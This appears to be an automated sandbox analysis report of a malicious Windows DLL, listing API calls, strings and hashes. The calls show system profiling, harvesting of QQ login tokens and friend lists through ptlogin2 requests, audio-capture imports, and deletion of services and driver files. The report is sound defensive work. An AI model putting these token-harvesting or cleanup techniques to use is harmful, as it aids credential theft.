                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHeapProcProcess$AllocLibraryLoadLocal
                                                  • String ID: %s:%u$*.*.*.*:*$AllocateAndGetTcpExTableFromStack$AllocateAndGetUdpExTableFromStack$CLOSE_WAIT$FIN_WAIT1$FIN_WAIT2$InternalGetTcpTable2$InternalGetUdpTableWithOwnerPid$LAST_ACK$TIME_WAIT$[TCP]$[UDP]$iphlpapi.dll$Wu
                                                  • API String ID: 370057222-2536726367
                                                  • Opcode ID: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                  • Instruction ID: 3878becebeafeda62e551408519d1494f05c47cd3e4fb1777d1cfee609c89dcd
                                                  • Opcode Fuzzy Hash: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                  • Instruction Fuzzy Hash: 53A2C1766083159FC324CF28CC449ABB7E5FBC9710F554A2DF94A93281DA74ED0ACB92
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32 ref: 1002A387
                                                  • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000000,?,?), ref: 1002A3B6
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002A3C1
                                                  • GetSystemInfo.KERNEL32(?), ref: 1002A3CF
                                                  • wsprintfA.USER32 ref: 1002A3F8
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000043,00000000,00000001,?), ref: 1002A551
                                                  • RegQueryValueExA.ADVAPI32(00000001,ProcessorNameString,00000000,?,?,00000043), ref: 1002A59F
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002A5EF
                                                  • GetComputerNameA.KERNEL32(?,secorPlartneC), ref: 1002A645
                                                    • Part of subcall function 1002A180: WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?,?,76C08400,?), ref: 1002A19F
                                                    • Part of subcall function 1002A180: WTSFreeMemory.WTSAPI32(?,00000000,000000FF,00000005,?,?,?,76C08400,?), ref: 1002A1D0
                                                  • GetTickCount.KERNEL32 ref: 1002A65B
                                                  • wsprintfA.USER32 ref: 1002A6AB
                                                  • GetDC.USER32(00000000), ref: 1002A6B2
                                                  • GetDeviceCaps.GDI32(00000000,00000075), ref: 1002A6C3
                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 1002A6C9
                                                  • wsprintfA.USER32 ref: 1002A6D9
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1002A6E1
                                                  • wsprintfA.USER32 ref: 1002A705
                                                  • wsprintfA.USER32 ref: 1002A727
                                                  • wsprintfA.USER32 ref: 1002A740
                                                  • GetCommandLineA.KERNEL32 ref: 1002A745
                                                  • wsprintfA.USER32 ref: 1002A759
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 1002A773
                                                  • wsprintfA.USER32 ref: 1002A807
                                                  • wsprintfA.USER32 ref: 1002A81F
                                                  • FindWindowA.USER32(?,00000000), ref: 1002A869
                                                  • GetWindowTextA.USER32(00000000,?,00000104), ref: 1002A8CA
                                                  • GetWindow.USER32(00000000,00000002), ref: 1002A9AA
                                                  • GetClassNameA.USER32(00000000,?,00000104), ref: 1002A9BC
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 1002A9DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$NameQueryWindow$CapsCloseDeviceMemoryOpenValue$ClassCommandComputerCountFindFreeGlobalInfoInformationLineReleaseSessionStatusSystemTextTickUser
                                                  • String ID: %d * %d$%d*%dMHz$%s%s%s$0$A$A$A$A$C$C$C$C$CTXOPConntion_Class$D$D$D$D$E$E$E$E$H$H$I$I$I$I$N$N$O$O$P$P$P$P$ProcessorNameString$R$R$R$R$R$R$S$S$S$S$T$T$W$W$a$a$c$c$e$e$e$e$e$e$l$l$m$m$n$n$o$o$o$r$r$r$r$r$s$s$s$s$secorPlartneC$t$t$t$t$y$y$~MHz
                                                  • API String ID: 2087514681-3067132264
                                                  • Opcode ID: c3aafca63d4541a4f23b0196fe3412c2bd167dc5efb1c85bbde7835129de271a
                                                  • Instruction ID: 58d400f4b91c49924f4ea43f818cc88c4a31776bace7832dff8664dd12829245
                                                  • Opcode Fuzzy Hash: c3aafca63d4541a4f23b0196fe3412c2bd167dc5efb1c85bbde7835129de271a
                                                  • Instruction Fuzzy Hash: 7722D13050C7C19EE325C638C854B9BBFD6ABD2304F484A5DF6D947282DBBA9908C767
                                                  APIs
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 1001410A
                                                  • InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 1001413A
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001414B
                                                  Strings
                                                  • Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded, xrefs: 100140CB
                                                  • pt_local_token=, xrefs: 10014280
                                                  • xui.ptlogin2.qq.com, xrefs: 100140A2
                                                  • /cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23, xrefs: 100140B4
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 10014082
                                                  • groups, xrefs: 100146D3
                                                  • HTTP/1.1, xrefs: 10014170, 10014410
                                                  • 0.9475416028552021, xrefs: 100143E7
                                                  • localhost.ptlogin2.qq.com, xrefs: 100140E0
                                                  • , xrefs: 10014100
                                                  • uin, xrefs: 10014658
                                                  • Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10014456
                                                  • Set-Cookie: , xrefs: 1001430E, 1001435F
                                                  • nickname, xrefs: 1001464D
                                                  • pt_local_tk=, xrefs: 100142B5
                                                  • /pt_get_uins?callback=ptui_getuins_CB&r=%s&%s, xrefs: 100143F3
                                                  • friends, xrefs: 100146B1
                                                  • GET, xrefs: 10014176, 10014416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID: $/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23$/pt_get_uins?callback=ptui_getuins_CB&r=%s&%s$0.9475416028552021$Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Set-Cookie: $friends$groups$localhost.ptlogin2.qq.com$nickname$pt_local_tk=$pt_local_token=$uin$xui.ptlogin2.qq.com
                                                  • API String ID: 1463438336-3428588184
                                                  • Opcode ID: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                  • Instruction ID: 10a0a4d67c7a86b0295143d81d79a2071c775b89c22be300c5b0aaeb6ee9b044
                                                  • Opcode Fuzzy Hash: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                  • Instruction Fuzzy Hash: C20249766047047BE310DA68DC45FEF73D9EBC4720F450A29FA05E7280EF79E90586A6
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetVersionExA.KERNEL32(?), ref: 1001E264
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001E292
                                                  • sprintf.MSVCRT ref: 1001E2AD
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1001E31B
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E34D
                                                  • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E377
                                                  • FindWindowA.USER32(#32770,1011F8E4), ref: 1001E391
                                                  • Sleep.KERNEL32(0000012C), ref: 1001E3A1
                                                  • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E3AD
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E414
                                                  • ExitProcess.KERNEL32 ref: 1001E433
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FindHandleLibraryWindow$AddressCloseLoadModuleProc$ExitFileFreeNameObjectProcessSingleSleepVersionWaitsprintf
                                                  • String ID: #32770$%s -acsi$-rsvc$-wait$.$.$2$2$3$3$A$A$A$A$C$C$D$E$E$E$GINA Logon$H$I$K$L$P$S$S$V$a$a$a$c$c$d$d$d$i$i$l$l$l$l$l$l$n$n$r$r$r$r$r$r$s$s$t$t$t$t$t$t$u$v$v$v$x
                                                  • API String ID: 2386940797-994141675
                                                  • Opcode ID: 1e0a7bc22bf6aebe3cf87ff531598241adf007e98930f03fc6feb3e8ce76e184
                                                  • Instruction ID: ea7d59c3eb16ec3cf07a4c106cc791e20c3a811cab5a71c348552375d6af4e86
                                                  • Opcode Fuzzy Hash: 1e0a7bc22bf6aebe3cf87ff531598241adf007e98930f03fc6feb3e8ce76e184
                                                  • Instruction Fuzzy Hash: 66C11D6040C3C19EE311C7788898B4FBFD5ABA6348F58495CF6D84B292D3BAD948C767
                                                  APIs
                                                  • AttachConsole.KERNEL32(?), ref: 100101B3
                                                  • Sleep.KERNEL32(0000000A), ref: 100101BB
                                                  • AttachConsole.KERNEL32(?), ref: 100101C5
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 100101D8
                                                  • #823.MFC42(00000000), ref: 100101E9
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 100101F9
                                                  • GetCurrentProcessId.KERNEL32 ref: 10010203
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10010217
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10010226
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001022D
                                                  • #825.MFC42(00000000), ref: 1001023E
                                                  • FreeConsole.KERNEL32 ref: 1001024C
                                                  • Sleep.KERNEL32(0000000A), ref: 10010254
                                                  • FreeConsole.KERNEL32 ref: 1001025A
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 10010266
                                                  • swprintf.MSVCRT(?,\Registry\Machine\System\CurrentControlSet\Services\%S,1011F4B8,NTDLL.DLL,ZwUnloadDriver,NTDLL.DLL,RtlInitUnicodeString,SeLoadDriverPrivilege,00000001), ref: 10010304
                                                  • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 1001039A
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 100103A6
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00010000), ref: 100103BD
                                                  • DeleteService.ADVAPI32(00000000), ref: 100103D0
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100103D7
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100103DA
                                                  • GetSystemDirectoryA.KERNEL32 ref: 1001049F
                                                  • lstrcatA.KERNEL32(?,?), ref: 100104B4
                                                  • DeleteFileA.KERNEL32(?), ref: 100104C4
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10010509
                                                  • lstrcatA.KERNEL32(?,?), ref: 10010518
                                                  • DeleteFileA.KERNEL32(?), ref: 10010522
                                                  • LocalFree.KERNEL32(?), ref: 1001052A
                                                  • free.MSVCRT ref: 1001053D
                                                  • free.MSVCRT ref: 10010546
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1001055D
                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 10010568
                                                  • IsWow64Process.KERNEL32(00000000), ref: 1001056F
                                                  • DeleteFileA.KERNEL32(?), ref: 1001060E
                                                  • SetServiceStatus.ADVAPI32(?,1012BB40), ref: 1001062D
                                                  • ExitProcess.KERNEL32 ref: 1001063A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Console$DeleteService$CloseDirectoryFileFreeHandleOpen$AttachCurrentListSleepSystemTerminatefreelstrcat$#823#825ExitLocalManagerStatusWindowsWow64swprintf
                                                  • String ID: .$.$.sys$Host$MarkTime$NTDLL.DLL$P$RtlInitUnicodeString$SYSTEM\CurrentControlSet\Services\$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\Select$SYSTEM\Setup$SeLoadDriverPrivilege$V$ZwUnloadDriver$\$\$\Registry\Machine\System\CurrentControlSet\Services\%S$\sysnative\drivers\$\system32\drivers\$a$b$d$d$d$e$g$g$m$n$o$o$s$t$u
                                                  • API String ID: 2905031204-766513331
                                                  • Opcode ID: b3828ce328706f99599d4bb0ae643d5ce18642db2ecfab872655972f4b2394e6
                                                  • Instruction ID: 6446d878d8e0c222466ad58f3a444538bf92c187c972cef3cdfa533132675e3c
                                                  • Opcode Fuzzy Hash: b3828ce328706f99599d4bb0ae643d5ce18642db2ecfab872655972f4b2394e6
                                                  • Instruction Fuzzy Hash: D5D12235604354ABE310DB78CC84B9B7BD5EB84314F180A1DF689AB2D1DBB4ED44CBA6
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LocalAlloc.KERNEL32(00000040,00000104), ref: 10019960
                                                  • OpenSCManagerA.ADVAPI32 ref: 10019977
                                                  • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199A3
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 100199AC
                                                  • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199CE
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000001), ref: 100199F4
                                                  • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,?), ref: 10019A1A
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A27
                                                  • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,00000000), ref: 10019A3B
                                                  • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A55
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A62
                                                  • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A7A
                                                  • lstrcatA.KERNEL32(?,100FBD1C), ref: 10019ADB
                                                  • lstrcatA.KERNEL32(?,100FBD14), ref: 10019B06
                                                  • lstrlenA.KERNEL32(00000040), ref: 10019B1C
                                                  • lstrlenA.KERNEL32(?), ref: 10019B24
                                                  • lstrlenA.KERNEL32 ref: 10019B2F
                                                  • lstrlenA.KERNEL32(?), ref: 10019B3B
                                                  • lstrlenA.KERNEL32(?), ref: 10019B44
                                                  • lstrlenA.KERNEL32(?), ref: 10019B4C
                                                  • LocalSize.KERNEL32(?), ref: 10019B5E
                                                  • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10019B70
                                                  • lstrlenA.KERNEL32(?), ref: 10019B7E
                                                  • lstrlenA.KERNEL32(?), ref: 10019B88
                                                  • lstrlenA.KERNEL32(?), ref: 10019BB1
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019BC6
                                                  • lstrlenA.KERNEL32 ref: 10019BCF
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019BFA
                                                  • lstrlenA.KERNEL32 ref: 10019C0B
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019C14
                                                  • lstrlenA.KERNEL32(00000001), ref: 10019C3A
                                                  • lstrlenA.KERNEL32(?), ref: 10019C49
                                                  • lstrlenA.KERNEL32(?), ref: 10019C6B
                                                  • lstrlenA.KERNEL32(?), ref: 10019C81
                                                  • lstrlenA.KERNEL32(?), ref: 10019CA9
                                                  • lstrlenA.KERNEL32(?), ref: 10019CBB
                                                  • lstrlenA.KERNEL32(?), ref: 10019CC5
                                                  • lstrlenA.KERNEL32(?), ref: 10019CE9
                                                  • LocalFree.KERNEL32(?), ref: 10019CFE
                                                  • LocalFree.KERNEL32(00000000), ref: 10019D01
                                                  • CloseServiceHandle.ADVAPI32(?), ref: 10019D08
                                                  • LocalFree.KERNEL32(00000000), ref: 10019D3B
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019D42
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10019D50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Local$Service$Alloc$Query$FreeOpen$CloseConfigConfig2EnumHandleProcessServicesStatuslstrcat$CurrentManagerSizeToken
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 19575313-2896544425
                                                  • Opcode ID: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                  • Instruction ID: 602a72ac4dd89d5092f96c4d0856d720342e345610072c012a51b9f9dfb16572
                                                  • Opcode Fuzzy Hash: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                  • Instruction Fuzzy Hash: 37D12C75204306AFD714DF64CC84AABB7E9FBC8700F54491DFA46A7250DB74E909CBA2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 1000115F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001168
                                                  • LoadLibraryA.KERNEL32 ref: 100011B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011B7
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutClose), ref: 100011C7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011CA
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInStop), ref: 100011DA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011DD
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInReset), ref: 100011ED
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011F0
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInUnprepareHeader), ref: 10001200
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001203
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInClose), ref: 10001211
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001214
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutReset), ref: 10001224
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001227
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutUnprepareHeader), ref: 10001237
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000123A
                                                  • #825.MFC42(?), ref: 100012C4
                                                  • #825.MFC42(00000000,?), ref: 100012CC
                                                  • #825.MFC42(?,00000000,?), ref: 100012D5
                                                  • #825.MFC42(?,?,00000000,?), ref: 100012DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#825
                                                  • String ID: C$H$KERNEL32.dll$TerminateThread$WINMM.dll$a$d$n$o$s$waveInClose$waveInReset$waveInStop$waveInUnprepareHeader$waveOutClose$waveOutReset$waveOutUnprepareHeader
                                                  • API String ID: 345516743-2415744366
                                                  • Opcode ID: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                  • Instruction ID: 3b114dfad24d7eddf03eb2cbd10a89371148df8dda5889fc91158876db1259a3
                                                  • Opcode Fuzzy Hash: 18d932df849a8b69c2fd67332b36b8b357b890c471afae06fbbbe5af20abdcb9
                                                  • Instruction Fuzzy Hash: 605143B5904384ABDB10DF74CC88D5B7F98EFD9350F45094DFA8457206DA3AD845CBA1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
